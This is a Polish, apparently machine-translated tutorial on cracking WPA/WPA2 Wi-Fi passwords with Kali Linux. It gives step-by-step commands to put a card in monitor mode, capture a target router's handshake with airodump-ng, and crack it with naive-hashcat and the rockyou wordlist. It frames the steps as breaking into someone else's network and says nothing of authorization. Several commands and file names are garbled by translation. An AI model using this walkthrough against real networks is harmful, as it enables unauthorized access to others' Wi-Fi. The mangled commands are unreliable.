Kali Linux

Ataki Kali Linux WPA i WPA2

Ataki Kali Linux WPA i WPA2
W tym artykule znajdziesz omówienie hakowania Wi-Fi i Wi-Fi. Zaczniemy od podstawowego wprowadzenia Wi-Fi i hakowania.

Wprowadzenie

Wierność bezprzewodowa lub Wi-Fi to rodzaj technologii wykorzystywanej do zapewnienia łączności z siecią komputerową bez połączenia kablowego lub przewodowego. Wi-Fi działa w ciągu 2.Zakres od 4 Ghz do 5 GHz i nie powinien zakłócać działania telefonów komórkowych, radia, telewizji lub przenośnych radiotelefonów. Funkcja Wi-Fi polega na przesyłaniu danych przez fale radiowe między urządzeniem klienckim a urządzeniem zwanym routerem. Router może przesyłać dane do systemów wewnętrznie lub zewnętrznie do Internetu. Wi-Fi nie jest ani bardziej, ani mniej bezpieczne niż tradycyjna sieć przewodowa, ale jest zupełnie innym interfejsem. Najważniejszą rzeczą do zapamiętania jest to, że Wired Equivalent Privacy (WEP) został wydany w 1997 roku i łatwo się do niego włamać. WEP można złamać w kilka minut lub mniej. Twoje nowoczesne urządzenia nie będą działać z siecią WEP, a większość routerów już jej nie obsługuje. Zaktualizowany WEP można również włamać za pomocą metod hakerskich.

Hakerstwo

Mówiąc najprościej, złamanie lub włamanie do czyichś danych osobowych jest znane jako hakowanie. Hakerzy mogą łatwo uzyskać dostęp do Twojego osobistego urządzenia lub komputera. Mogą złamać Twoje hasła i uzyskać dostęp do Twojej sieci bezprzewodowej. Mogą ominąć zabezpieczenia sieci bezprzewodowej i włamać się, bez względu na rodzaj szyfrowania, z którego korzysta użytkownik.

Zazwyczaj, jeśli chcesz włamać się do czyjejś sieci bezprzewodowej, najpierw musisz wiedzieć o używanym szyfrowaniu. Jak wspomniano wcześniej, sieć typu WPE nie była bezpieczna od dłuższego czasu. Zwykle można się do niego włamać w ciągu kilku minut. To samo dotyczy sieci WPA, jeśli używasz słabego hasła. Jeśli jednak używasz silnego hasła, jest ono stosunkowo bezpieczne, z wyjątkiem kodu PIN WPS7. Jest to luka w zabezpieczeniach sprzętowych, z której korzysta wiele routerów, umożliwiając hakerom uzyskanie pinu zapewniającego pełny dostęp do routera. Zwykle jest to ośmiocyfrowy numer zapisany na spodzie routera. Możesz uzyskać tę liczbę, wykonując poniższe czynności.

Otwórz terminal Kali Linux

Pierwszym krokiem jest po prostu otwarcie terminala Kali Linux. Aby to zrobić, naciśnij ALT+CTRL+T. Możesz także nacisnąć ikonę aplikacji terminala, aby otworzyć terminal.

Wpisz polecenie dla instalacji aircrack-ng

Następnym krokiem jest instalacja aircrack-ng. Wpisz następujące polecenie, aby to zrobić:

$ sudo apt-get install aircrack-ng

Wprowadź hasło, aby się zalogować

Wprowadź swoje hasło roota, aby umożliwić dostęp. Po wprowadzeniu hasła logowania naciśnij press Wchodzić przycisk, aby kontynuować.

Zainstaluj aircrack-ng

Wkrótce po zalogowaniu naciśnij przycisk Y. Umożliwi to instalację aircrack-ng.

Włącz airmon-ng

Airmon-ng to oprogramowanie służące do konwersji trybu zarządzanego na tryb monitora. Użyj następującego polecenia, aby włączyć airmon-ng:

$ airmon-ng

Znajdź nazwę monitora

Następnym krokiem jest znalezienie nazwy monitora, aby kontynuować hakowanie. Możesz zobaczyć nazwę monitora w kolumnie interfejsu. W niektórych przypadkach możesz nie być w stanie wyświetlić nazwy monitora. Ten błąd występuje, jeśli Twoja karta nie jest obsługiwana.

Rozpocznij monitorowanie sieci

Wpisz następujące polecenie, aby rozpocząć proces monitorowania:

$ airmon-ng start wlan0

Jeśli celujesz w inną sieć, powinieneś zastąpić „wlan0” poprawną nazwą sieci.

Włącz interfejs trybu monitorowania

Następujące polecenie służy do włączenia interfejsu trybu monitora:

$ iwconfig

Zabij procesy, które zwracają błędy

Twój system może powodować pewne zakłócenia. Użyj następującego polecenia, aby usunąć ten błąd.

$ airmon-ng check kill

Przejrzyj interfejs monitora

Następnym krokiem jest sprawdzenie nazwy monitora. W tym przypadku nazywa się „wlan0mon”.'

Uzyskaj nazwy wszystkich routerów

Nazwy wszystkich dostępnych routerów pojawią się po wpisaniu następującego polecenia.

$ airodump-ng mon0

Znajdź nazwę routera

Najpierw musisz znaleźć nazwę konkretnego routera, który chcesz zhakować.

Upewnij się, że router korzysta z zabezpieczeń WPA lub WPA2

Jeśli nazwa WPA pojawi się na ekranie, możesz kontynuować hakowanie.

Zanotuj adres MAC i numer kanału.

To są podstawowe informacje o sieci. Możesz je zobaczyć po lewej stronie sieci.

Monitoruj wybraną sieć

Użyj następującego polecenia, aby monitorować szczegóły sieci, którą chcesz zhakować.

$ airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0

Poczekaj na uścisk dłoni

Poczekaj, aż zobaczysz na ekranie napis „WPA HANDSHAKE”.

Wyjdź z okna, naciskając CTRL+C. Na ekranie komputera pojawi się plik cap.

Zmień nazwę pliku czapki

Dla ułatwienia możesz edytować nazwę pliku. Użyj w tym celu następującego polecenia:

$ mv ./-01.nazwa czapki.czapka

Konwertuj plik na format hccapx

Możesz łatwo przekonwertować plik do formatu hccapx za pomocą konwertera Kali.

Użyj następującego polecenia, aby to zrobić:

$ cap2hccapx.nazwa kosza.nazwa czapki.hccapx

Zainstaluj naiwny hasz-kot

Teraz możesz złamać hasło, korzystając z tej usługi. Użyj następującego polecenia, aby rozpocząć pękanie.

$ sudo git clone https://github.com/brannondorsey/naiwny-hashcat
$ cd naiwny-hash-kot

$ curl -L -o dicts/rockyou.tekst

Uruchom naiwny hasz-kot

Aby uruchomić usługę naive-hash-cat, wprowadź następujące polecenie:

$ HASH_FILE=nazwa.hccapx PLIK_POT=nazwa.garnek HASH_TYPE=2500 ./naiwny-hash-kot.cii

Poczekaj, aż hasło sieciowe zostanie złamane

Jak tylko hasło zostanie złamane, zostanie ono wymienione w pliku. Ten proces może potrwać miesiące, a nawet lata. Wpisz następujące polecenie po zakończeniu tego procesu, aby zapisać hasło. Złamane hasło jest pokazane na ostatnim zrzucie ekranu.
[cc lang=”bash” szerokość=”780"]
$ aircrack-ng -a2 -b MAC -w rockyou.nazwa txt.czapka
[cc]

Wniosek

Korzystając z Kali Linux i jego narzędzi, hakowanie może stać się łatwe. Możesz łatwo uzyskać dostęp do haseł, wykonując czynności wymienione powyżej. Mamy nadzieję, że ten artykuł pomoże ci złamać hasło i zostać etycznym hakerem.

How to reverse Mouse and Touchpads scrolling direction in Windows 10
Mouse and Touchpads not only make computing easy but more efficient and less time-consuming. We cannot imagine a life without these devices, but still...
How to change Mouse pointer and cursor size, color & scheme on Windows 10
The mouse pointer and cursor in Windows 10 are very important aspects of the operating system. This can be said for other operating systems as well, s...
Gry Darmowe i otwarte silniki gier do tworzenia gier na Linuksa
Darmowe i otwarte silniki gier do tworzenia gier na Linuksa
Ten artykuł zawiera listę darmowych i otwartych silników gier, których można używać do tworzenia gier 2D i 3D w systemie Linux. Istnieje wiele takich ...